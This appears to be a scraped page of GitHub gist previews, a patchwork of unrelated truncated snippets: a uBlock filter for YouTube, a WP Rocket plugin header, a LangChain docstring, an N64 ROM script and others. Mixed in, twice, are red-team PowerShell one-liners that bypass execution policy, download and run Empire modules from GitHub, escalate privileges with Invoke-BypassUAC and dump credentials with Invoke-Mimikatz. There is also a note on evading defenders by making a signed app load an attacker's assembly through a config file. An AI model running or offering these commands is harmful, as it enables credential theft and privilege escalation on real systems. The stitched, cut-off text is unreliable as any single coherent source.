Simple overview of use/purpose.
An in-depth paragraph about your project and overview of use.
[+] Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
#Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
#Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
#Import Mimikatz Module to run further commands | |
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')" |
! [Add this to the "My filters" section of uBlock Origin's settings] | |
! ### Remove YouTube's gorram "Breaking news" section ### | |
! ### I go to YouTube to AVOID daily bullshit, not to have it shoved in my face!! ### | |
! This removes page-width blocks - `<ytd-rich-section-renderer>` tags - which have a descendent somewhere with ID "title" and the text "Breaking news". | |
! The match on "Breaking news" uses a regular expression primarily so that it can be made case-insensitive. | |
! The `#title` tag we're matching looked like this, at least for me on 2020-02-01: | |
! <span id="title" class="style-scope ytd-rich-shelf-renderer">Breaking news</span> | |
! The other two `:has()` rules are just a bit of extra filtering that I hope might improve performance and/or reduce the chance of this rule matching where it's not wanted. | |
! YouTube is likely to change things and break this rule before too long, in which case removing `:has(:scope #dismissable)` and `:has(:scope #featured-badge)` may help. | |
! Note that `:scope` limits matches to |
# Description: | |
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
# Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
# Import Mimikatz Module to run further commands |
We can do this by experimenting with .config files.
Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name
In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.
We do this by directing the application to read a config file we provide.
<?php | |
/** | |
* Plugin Name: WP Rocket | Disable Cache Preloading | |
* Description: Prevents WP Rocket’s preload bot from visiting your site. | |
* Author: WP Rocket Support Team | |
* Author URI: http://wp-rocket.me/ | |
* Plugin URI: https://gist.github.com/glueckpress/a6c1f7a22a92e8e8bb10 | |
* License: GNU General Public License v3 or later | |
* License URI: http://www.gnu.org/licenses/gpl-3.0.html | |
*/ |
"""This is an example of how to use async langchain with fastapi and return a streaming response. | |
The latest version of Langchain has improved its compatibility with asynchronous FastAPI, | |
making it easier to implement streaming functionality in your applications. | |
""" | |
import asyncio | |
import os | |
from typing import AsyncIterable, Awaitable | |
import uvicorn | |
from dotenv import load_dotenv |
#!/usr/bin/bash | |
# Get entry point from N64 ROM | |
dd if=test.z64 bs=1 skip=8 count=4 of=entrypoint >& /dev/null | |
# Convert entrypoint to little endian | |
#mips-elf-objcopy -I binary -O binary --reverse-bytes=4 entrypoint entrypoint | |
# Construct an ELF | |
mips-elf-objcopy -I binary test.z64 -O elf32-bigmips -B mips --adjust-section-vma .data+0x80000000 foo.elf | |
# Patch to MIPS III | |
printf '\x20\x00\x00\x00' | dd bs=1 seek=36 count=4 conv=notrunc of=foo.elf >& /dev/null |
import asyncio | |
import copy | |
import hashlib | |
import json | |
import os | |
import random | |
from dataclasses import dataclass | |
from typing import Any, Dict, List, Optional | |
import numpy as np |
#!/usr/bin/python | |
# Copyright 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved. | |
# | |
# Licensed under the Amazon Software License (the "License"). You may not use | |
# this file except in compliance with the License. A copy of the License is | |
# located at http://aws.amazon.com/asl/ or in the "license" file accompanying | |
# this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR | |
# CONDITIONS OF ANY KIND, either express or implied. See the License for the specific | |
# language governing permissions and limitations under the License. |